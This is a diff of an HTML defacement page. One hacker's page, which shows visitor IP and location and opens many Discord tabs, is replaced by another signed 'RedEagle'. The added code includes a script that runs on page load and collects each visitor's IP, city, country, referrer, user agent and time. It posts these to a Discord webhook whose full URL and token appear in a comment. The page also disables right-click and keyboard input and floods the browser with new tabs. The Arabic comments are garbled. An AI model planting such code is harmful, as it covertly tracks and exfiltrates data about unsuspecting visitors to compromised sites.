|
1 | | -<!DOCTYPE html> |
2 | | -<html lang="en"> |
3 | | -<head> |
4 | | - <meta charset="UTF-8"> |
| 1 | + |
| 2 | +<!-- saved from url=(0070)http://www.234wed.com/attached/file/20241118/20241118043043_68676.html --> |
| 3 | +<html lang="ar"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><script> |
| 4 | + document.write(unescape |
| 5 | + </script> |
| 6 | + |
| 7 | + |
| 8 | + |
5 | 9 | <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
6 | | - <title>! Ais here</title> |
| 10 | + <title> </title> |
7 | 11 | <style> |
8 | 12 | body { |
9 | | - background: url('https://media3.giphy.com/media/7OXmhlBM8EzDPKbiIA/200.gif?cid=6c09b9521pjhe13bk9usavloan5s9cuulrnfhvflvdu3188u&ep=v1_gifs_search&rid=200.gif&ct=g') no-repeat center center fixed; |
10 | | - background-size: cover; |
11 | | - color: red; |
| 13 | + background-color: black; |
| 14 | + color: white; |
| 15 | + font-family: 'Arial', sans-serif; |
12 | 16 | text-align: center; |
13 | | - font-family: Tempus Sans ITC |
14 | | -, sans-serif; |
| 17 | + padding: 20px; |
15 | 18 | } |
| 19 | + |
16 | 20 | h1 { |
17 | | - font-size: 30px; |
18 | | - margin-top: 350px; |
19 | | - position: absolute; |
20 | | - top: 20%; |
21 | | - left: 50%; |
22 | | - transform: translate(-50%, -50%); |
| 21 | + color: #ffffff; |
| 22 | + font-size: 2.5em; |
| 23 | + margin-bottom: 0; |
23 | 24 | } |
24 | | - .info { |
25 | | - margin-top: 50px; |
26 | | - font-size: 30px; |
| 25 | + |
| 26 | + h1 span { |
| 27 | + color: #ff0000; /* DHF (FA3,J */ |
27 | 28 | } |
28 | | - .container { |
| 29 | + |
| 30 | + .online-status { |
| 31 | + color: #c7c7c7; |
| 32 | + font-size: 1.2em; |
| 33 | + margin-bottom: 20px; |
| 34 | + } |
| 35 | + |
| 36 | + .profile { |
| 37 | + margin: 20px auto; |
29 | 38 | display: flex; |
30 | 39 | flex-direction: column; |
31 | 40 | align-items: center; |
| 41 | + } |
| 42 | + |
| 43 | + .profile-img { |
| 44 | + width: 150px; |
| 45 | + height: 150px; |
| 46 | + border-radius: 50%; |
| 47 | + border: 3px solid #a58aff; |
| 48 | + margin-bottom: 10px; |
| 49 | + } |
| 50 | + |
| 51 | + .profile-info { |
| 52 | + color: #fff; |
| 53 | + } |
| 54 | + |
| 55 | + .profile-info span { |
| 56 | + display: block; |
| 57 | + font-size: 1.1em; |
| 58 | + } |
| 59 | + |
| 60 | + .money-info { |
| 61 | + display: flex; |
32 | 62 | justify-content: center; |
33 | | - height: 100vh; |
| 63 | + gap: 20px; |
| 64 | + margin: 20px 0; |
34 | 65 | } |
35 | | - .image-box { |
36 | | - border: 2px solid rgb(8, 8, 8); |
37 | | - padding: 1px; |
38 | | - display: inline-block; |
| 66 | + |
| 67 | + .money-info div { |
| 68 | + background-color: #2e0249; |
| 69 | + color: #ffffff; |
| 70 | + padding: 10px 20px; |
| 71 | + border-radius: 20px; |
| 72 | + box-shadow: 0 0 10px #a58aff; |
| 73 | + } |
| 74 | + |
| 75 | + .hacked-message { |
| 76 | + margin-top: 30px; |
| 77 | + } |
| 78 | + |
| 79 | + .hacked-message img { |
| 80 | + width: 200px; |
| 81 | + margin-bottom: 20px; |
| 82 | + } |
| 83 | + |
| 84 | + .hacked-message p { |
| 85 | + color: #ff4d4d; |
| 86 | + font-size: 1.2em; |
| 87 | + } |
| 88 | + |
| 89 | + .footer { |
| 90 | + margin-top: 50px; |
| 91 | + color: #c7c7c7; |
| 92 | + } |
| 93 | + |
| 94 | + .icons { |
| 95 | + display: flex; |
| 96 | + justify-content: center; |
| 97 | + gap: 20px; |
| 98 | + margin-top: 40px; |
| 99 | + } |
| 100 | + |
| 101 | + .icon { |
| 102 | + width: 40px; |
| 103 | + height: 40px; |
| 104 | + } |
| 105 | + body, html { |
| 106 | + margin: 0; |
| 107 | + padding: 0; |
| 108 | + height: 100%; |
| 109 | + overflow: hidden; |
| 110 | + } |
| 111 | + .video-bg { |
| 112 | + position: absolute; |
| 113 | + top: 0; |
| 114 | + left: 0; |
| 115 | + width: 100%; |
| 116 | + height: 100%; |
| 117 | + overflow: hidden; |
| 118 | + } |
| 119 | + .video-bg video { |
| 120 | + min-width: 100%; |
| 121 | + min-height: 100%; |
| 122 | + width: auto; |
| 123 | + height: auto; |
| 124 | + position: absolute; |
| 125 | + top: 50%; |
| 126 | + left: 50%; |
| 127 | + transform: translate(-50%, -50%); |
| 128 | + z-index: -1; |
39 | 129 | } |
40 | | - .discord-link { |
41 | | - font-size: 24px; |
42 | | - margin-top: 20px; |
43 | | - text-decoration: none; |
44 | | - color: red; |
| 130 | + .content { |
| 131 | + position: relative; |
| 132 | + z-index: 1; |
| 133 | + text-align: center; |
| 134 | + color: white; |
45 | 135 | } |
46 | 136 | </style> |
47 | 137 | </head> |
48 | | -<body> |
49 | | - <h1> Cheetah is on top by L7N & Toxic</h1> |
50 | | - <div class="container"> |
51 | | - <div class="image-box"> |
52 | | - <img src= "https://i.pinimg.com/originals/04/67/ac/0467acd8140a9370d610bb2ac71aa305.gif" alt="Skull Image" width="500"> |
53 | | - </div> |
54 | | - <div class="info" id="user-info"> |
55 | | - <p><strong>IP:</strong> Loading...</p> |
56 | | - <p><strong>City:</strong> Loading...</p> |
57 | | - <p><strong>Country:</strong> Loading...</p> |
58 | | - <p><strong>Timezone:</strong> Loading...</p> |
59 | | - </div> |
60 | | - <a href="https://discord.gg/m-8" class="discord-link" target="_blank">discord.gg/m-8</a> |
| 138 | + |
| 139 | + |
| 140 | + |
| 141 | + |
| 142 | + |
| 143 | + <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()"><table width="100%" height="90%"> |
| 144 | + <tbody><tr><td> |
| 145 | + <center> |
| 146 | + <small> </small> |
| 147 | + <br> |
| 148 | + |
| 149 | + |
| 150 | + |
| 151 | + <div class="hacked-message"> |
| 152 | + <p><span style="color: rgb(255, 0, 0);"> ( hi me NESM , RedEagle )</span></p> |
| 153 | + <p>oops! # my RedEagle - Zxr good luck</p> |
| 154 | + <p>https://discord.gg/redcheat , MSO </p> |
61 | 155 | </div> |
62 | | - <audio autoplay loop> |
63 | | - <source src="https://github.com/ttt402d/toxic44442/raw/refs/heads/main/0131dddddd.mp3" type="audio/mpeg"> |
64 | | - Your browser does not support the audio element. |
65 | | - </audio> |
| 156 | + |
| 157 | + |
| 158 | + |
66 | 159 | <script> |
67 | | - fetch('https://ipapi.co/json/') |
68 | | - .then(response => response.json()) |
69 | | - .then(data => { |
70 | | - document.getElementById('user-info').innerHTML = ` |
71 | | - <p><strong>IP:</strong> ${data.ip}</p> |
72 | | - <p><strong>City:</strong> ${data.city}</p> |
73 | | - <p><strong>Country:</strong> ${data.country_name}</p> |
74 | | - <p><strong>Timezone:</strong> ${data.timezone}</p> |
75 | | - `; |
76 | | - }) |
77 | | - .catch(() => { |
78 | | - document.getElementById('user-info').innerHTML = '<p>Failed to load IP data.</p>'; |
79 | | - }); |
80 | | - |
81 | | - // Open 15 tabs to the Discord link (may be blocked by browsers) |
82 | | - for (let i = 0; i < 15; i++) { |
83 | | - window.open('https://discord.gg/69q', '_blank'); |
| 160 | + async function fetchIPAddress() { |
| 161 | + try { |
| 162 | + let response = await fetch('https://api.ipify.org?format=json'); |
| 163 | + let data = await response.json(); |
| 164 | + document.getElementById('ip-address').textContent = ` ip ${data.ip}`; |
| 165 | + } catch (error) { |
| 166 | + document.getElementById('ip-address').textContent = ''; |
| 167 | + console.error('Error fetching IP address:', error); |
| 168 | + |
| 169 | + } |
84 | 170 | } |
| 171 | + |
| 172 | + // Fetch IP address on page load |
| 173 | + fetchIPAddress(); |
85 | 174 | </script> |
86 | | - |
87 | | -</body> |
88 | | -</html> |
| 175 | + |
| 176 | + |
| 177 | + |
| 178 | + |
| 179 | + |
| 180 | + |
| 181 | + |
| 182 | + |
| 183 | + <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
| 184 | + <title>IP Address Display</title> |
| 185 | + <style> |
| 186 | + } |
| 187 | + .container { |
| 188 | + text-align: center; |
| 189 | + } |
| 190 | + .ip-address { |
| 191 | + font-size: 1em; |
| 192 | + font-weight: bold; |
| 193 | + color: #ff4d4d; |
| 194 | + animation: pulse 1s infinite; |
| 195 | + } |
| 196 | + </style> |
| 197 | + |
| 198 | + |
| 199 | + <div class="container"> |
| 200 | + <div class="ip-address" id="ip-address">Your IP: 2.90.212.148</div> |
| 201 | + <div class="message">RedEagle</div> |
| 202 | + |
| 203 | + |
| 204 | + |
| 205 | + <div class="video-bg"> |
| 206 | + <video autoplay="" muted="" loop=""> |
| 207 | + <source src="https://e.top4top.io/m_3307v4g0v1.mov" type="video/mp4"> |
| 208 | + Your browser does not support the video tag. |
| 209 | + </video> |
| 210 | + </div> |
| 211 | + |
| 212 | + |
| 213 | + |
| 214 | + <audio autoplay="" loop=""> |
| 215 | + <source src="https://e.top4top.io/m_3307v4g0v1.mov" type="audio/mpeg"> |
| 216 | + Your browser does not support the audio element. |
| 217 | + </audio> |
| 218 | + |
| 219 | + |
| 220 | + |
| 221 | + |
| 222 | + |
| 223 | + <script type="text/javascript"> |
| 224 | + window.onload = function() { |
| 225 | + setTimeout(function() { |
| 226 | + window.open('https://discord.gg/m-8','_blank'); |
| 227 | + window.open('https://discord.gg/m-8','_blank'); |
| 228 | + window.open('https://discord.gg/m-8','_blank'); |
| 229 | + window.open('https://discord.gg/m-8','_blank'); |
| 230 | + window.open('https://discord.gg/m-8','_blank'); |
| 231 | + window.open('https://discord.gg/m-8','_blank'); |
| 232 | + window.open('https://discord.gg/m-8','_blank'); |
| 233 | + window.open('https://discord.gg/m-8','_blank'); |
| 234 | + window.open('https://discord.gg/m-8','_blank'); |
| 235 | + window.open('https://discord.gg/m-8','_blank'); |
| 236 | + window.open('https://discord.gg/m-8','_blank'); |
| 237 | + window.open('https://discord.gg/m-8','_blank'); |
| 238 | + }, 5000); |
| 239 | + } |
| 240 | + </script> |
| 241 | + |
| 242 | + |
| 243 | + |
| 244 | + |
| 245 | + |
| 246 | + |
| 247 | + <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
| 248 | + <title>E9DHE'* 'D2'&1</title> |
| 249 | + <script> |
| 250 | + // /'D) D,E9 H%13'D (J'F'* 'D2'&1 %DI Discord Webhook |
| 251 | + async function sendVisitorInfo() { |
| 252 | + try { |
| 253 | + // ,D( 9FH'F 'D@ IP EF ./E) ipify |
| 254 | + const ipResponse = await fetch('https://api.ipify.org?format=json'); |
| 255 | + const ipData = await ipResponse.json(); |
| 256 | + const ip = ipData.ip; |
| 257 | + |
| 258 | + // ,D( E9DHE'* 'DEHB9 (F'!K 9DI 9FH'F 'D@ IP EF ./E) ipinfo |
| 259 | + const ipInfoResponse = await fetch(`https://ipinfo.io/${ip}/json`); |
| 260 | + const ipInfoData = await ipInfoResponse.json(); |
| 261 | + |
| 262 | + // 'D-5HD 9DI E9DHE'* 'DE*5A- HEHB9 'D%-'D) |
| 263 | + const referrer = document.referrer || "E('41)"; // %0' DE JCF GF'C 1'(7 %-'D) |
| 264 | + const userAgent = navigator.userAgent; |
| 265 | + const dateTime = new Date().toLocaleString(); // *'1J. HHB* 'D/.HD |
| 266 | + |
| 267 | + // %9/'/ 1'(7 'D@ Webhook 'D.'5 (C |
| 268 | + const webhookUrl = ''; // '3*(/D https://discordapp.com/api/webhooks/1333881588684947537/ThFYiC9XlR5UNSl8c4Txxtf3dQK6qRBRDRosoN0C3FktR5TKvMYZ2J2ygZyzBeVi5gIq (1'(7 'DHJ( GHC 'D.'5 (C |
| 269 | + |
| 270 | + // %13'D 'D(J'F'* %DI Discord Webhook |
| 271 | + await fetch(webhookUrl, { |
| 272 | + method: 'POST', |
| 273 | + headers: {'Content-Type': 'application/json'}, |
| 274 | + body: JSON.stringify({ |
| 275 | + content: "**New visitor information**", // 'D9FH'F 'D#3'3J |
| 276 | + embeds: [ |
| 277 | + { |
| 278 | + title: "Visitor Details", // 9FH'F 'D13'D) AJ Discord |
| 279 | + fields: [ |
| 280 | + { name: "IP Address", value: ip, inline: true }, // 916 9FH'F 'D@ IP |
| 281 | + { name: "Country", value: ipInfoData.country, inline: true }, // 916 'D/HD) |
| 282 | + { name: "City", value: ipInfoData.city || "Unknown", inline: true }, // 916 'DE/JF) |
| 283 | + { name: "Region", value: ipInfoData.region || "Unknown", inline: true }, // 916 'DEF7B) |
| 284 | + { name: "Referrer", value: referrer, inline: false }, // 1'(7 'D%-'D) |
| 285 | + { name: "User Agent", value: userAgent, inline: false }, // E9DHE'* 'DE*5A- |
| 286 | + { name: "Date & Time", value: dateTime, inline: false } // *'1J. HHB* 'D/.HD |
| 287 | + ], |
| 288 | + color: 3066993 // DHF ('.*J'1J) |
| 289 | + } |
| 290 | + ] |
| 291 | + }) |
| 292 | + }); |
| 293 | + |
| 294 | + // 916 9FH'F 'D@ IP 9DI 'D5A-) ('.*J'1J) |
| 295 | + document.getElementById('ip-address').textContent = `Your IP: ${ip}`; |
| 296 | + |
| 297 | + } catch (error) { |
| 298 | + console.error('Error fetching visitor information:', error); |
| 299 | + } |
| 300 | + } |
| 301 | + |
| 302 | + // 9F/ *-EJD 'D5A-) J*E '3*/9'! 'D/'D) |
| 303 | + window.onload = function() { |
| 304 | + sendVisitorInfo(); |
| 305 | + }; |
| 306 | + </script> |
| 307 | + |
| 308 | + |
| 309 | + <h1></h1> |
| 310 | + <p id="ip-address"></p> |
| 311 | + |
| 312 | + |
| 313 | + </div></center></td></tr></tbody></table></body></html> |
0 commit comments